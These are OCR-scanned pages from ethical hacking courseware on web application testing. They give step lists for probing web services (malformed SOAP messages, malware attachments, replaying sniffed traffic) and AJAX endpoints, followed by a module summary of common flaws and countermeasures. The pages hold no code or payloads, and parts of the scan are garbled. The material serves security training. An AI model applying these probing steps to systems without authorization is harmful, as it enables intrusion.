260 Ethical Hacking and Countermeasures Hacking Web Applications Web Services Testing CEH w To gather WS information use tools such as wsch ess, Soaplite, CURL, Peri, etc. and online tools such as UDDI Browser, WSIndex, and Xmethods» Use tools such as WSDigger, WebScarab, and Found stone to automate web services security testing «Pass malformed SOAP messages to XML parser or attach a very large string to the message. Use WSdigger to perform automated XML structure testing e Use web application vulnerability scanners such as WebScarab to test XML content-level vulnerabilities «Pass malicious content on the HTTP GET strings that invoke XML applications» Craft an XML document (SOAP message) to send to a web service that contains malware as an attachment to check if XML document has SOAP attachment vulnerability» Attempt to resend a sniffed XML message using Wireshark and WebScarab In fo rm a tio n a b o u t SQL, X P ath, b u ffe r o v e rflo w, a n d c o m m a n d in je c tio n v u ln e ra b ilitie s I n fo r m a tio n a b o u t M IT M v u ln e r a b ility H TTP G ET/R EST a tta c k v e c to r s SOAP m e s s a g e in fo r m a tio n Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. W e b S e r v i c e s T e s t i n g Stepl: Gather WS information Gather WS information using tools such as Net Square wschess, Soaplite, CURL, Perl, etc. and online tools such as UDDI Browser, WSIndex, and Xmethods. Step 2: Test WSDL Test WSDL to determine various entry points of WSDL. You can automate web services security testing using tools such as WSDigger, WebScarab, and Foundstone. Step 3: Test XML structural Pass malformed SOAP messages to the XML parser or attach a very large string to the message. Use WSdigger to perform automated XML structure testing. Step 4: Test XML content-level Use web application vulnerability scanners such as WebScarab to test XML content-level vulnerabilities. Step 5: Test HTTP GET parameters/rest Pass malicious content on the HTTP GET strings that invoke XML applications. Module 13 Page 1982 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

261 Ethical Hacking and Countermeasures Hacking Web Applications Step6: Test naughty SOAP attachments Craft an XML document (SOAP message) to send to a web service that contains malware as an attachment to check if XML document has SOAP attachment vulnerability. Step 7: Perform replay testing Attempt to resend a sniffed XML message using Wireshark and WebScarab. This test gives information about MITM vulnerability. Module 13 Page 1983 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

262 Ethical Hacking and Countermeasures Hacking Web Applications AJAX Testing CEH AJAX a p p lic a tio n c a ll e n d p o in ts y P a rs e t h e H T M L a n d J a v a S c r ip t f ile s X M L H ttp R e q u e s t o b je c t, J a v a S c rip t file s, AJAX fr a m e w o r k s U s e a p r o x y t o... v F o rm a t o f a p p lic a tio n o b s e r v e t r a f f i c re q u e s ts 8 E n u m e r a te t h e A JA X c a ll e n d p o in t s f o r t h e a s y n c h r o n o u s c a lls u s in g t o o ls s u c h a s S p r a ja x ט O b s e r v e H T M L a n d J a v a S c r ip t f ile s t o f in d U R L s o f a d d it io n a l a p p lic a t io n s u r fa c e e x p o s u r e U s e p r o x ie s a n d s n if f e r s t o o b s e r v e t r a f f ic g e n e r a te d b y u s e r - v ie w a b le p a g e s a n d t h e b a c k g r o u n d a s y n c h r o n o u s t r a f f i c t o t h e A J A X e n d p o in t s in o r d e r t o d e t e r m in e t h e f o r m a t a n d d e s t in a t io n o f t h e r e q u e s ts Copyright by EC-Cauactl. All Rights Reserved. Reproduction is S trictly Prohibited. A J A X T e s t i n g The following are the steps used to carry out AJAX pen testing: Step 1: Test for AJAX Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax. Step 2: Parse the HTML and JavaScript files Observe HTML and JavaScript files to find URLs of additional application surface exposure. Step 3: Use a proxy to observe traffic Use proxies and sniffers to observe traffic generated by user-viewable pages and the background asynchronous traffic to the AJAX endpoints in order to determine the format and destination of the requests. Module 13 Page 1984 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

263 Ethical Hacking and Countermeasures Hacking Web Applications M odule Summary CEH Urtiffetf itknji luilwt O rg a n iz a tio n s to d a y re ly h e a v ily o n w e b a p p lic a tio n s a n d W e b 2.0 te c h n o lo g ie s t o s u p p o rt ke y b u sin e ss p roce sses a n d im p ro v e p e rfo rm a n c e W ith in c re a s in g d e p e n d e n c e, w e b a p p lic a tio n s a n d w e b service s a re in c re a s in g ly b e in g ta rg e te d b y v a rio u s a tta c k s th a t re s u lts in h u g e re v e n u e loss fo r th e o rg a n iz a tio n s S o m e o f th e m a jo r w e b a p p lic a tio n v u ln e r a b ilitie s in c lu d e in je c tio n fla w s, c ro s s -s ite s c rip tin g (XSS), SQL in je c tio n, s e c u rity m is c o n fig u ra tio n, b ro k e n se ssio n m a n a g e m e n t, e tc. In p u t v a lid a tio n fla w s a re a m a jo r c o n c e rn as a tta c k e rs ca n e x p lo it th e s e fla w s t o p e rfo rm o r c re a te a base fo r m o s t o f th e w e b a p p lic a tio n a tta c k s, in c lu d in g c ro s s -s ite s c rip tin g, b u ffe r o v e rflo w, in je c tio n a tta c k s, e tc. It is a lso o b s e rv e d th a t m o s t o f th e v u ln e ra b ilitie s re s u lt b e cause o f m is c o n fig u ra tio n a n d n o t fo llo w in g s ta n d a rd s e c u rity p ra c tic e s C o m m o n c o u n te rm e a s u re s fo r w e b a p p lic a tio n s e c u rity in c lu d e s e cure a p p lic a tio n d e v e lo p m e n t, in p u t v a lid a tio n, c re a tin g a n d fo llo w in g s e c u rity b e s t p ra c tic e s, u s in g W AF F ire w a ll/id S a n d p e rfo rm in g re g u la r a u d itin g o f n e tw o rk u sin g w e b a p p lic a tio n s e c u rity to o ls M o d u l e S u m m a r y Organizations today rely heavily on web applications and Web 2.0 technologies to support key business processes and improve performance. e e With increasing dependence, web applications and web services are increasingly being targeted by various attacks that results in huge revenue loss for the organizations. Some of the major web application vulnerabilities include injection flaws, cross-site scripting (XSS), SQL injection, security misconfiguration, broken session management, etc. Input validation flaws are a major concern as attackers can exploit these flaws to perform or create a base for most of the web application attacks, including cross-site scripting, buffer overflow, injection attacks, etc. It is also observed that most of the vulnerabilities result because of misconfiguration and not following standard security practices. Common countermeasures for web application security include secure application development, input validation, creating and following security best practices, using WAF firewall/ids, and performing regular auditing of network using web application security tools. Module 13 Page 1985 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.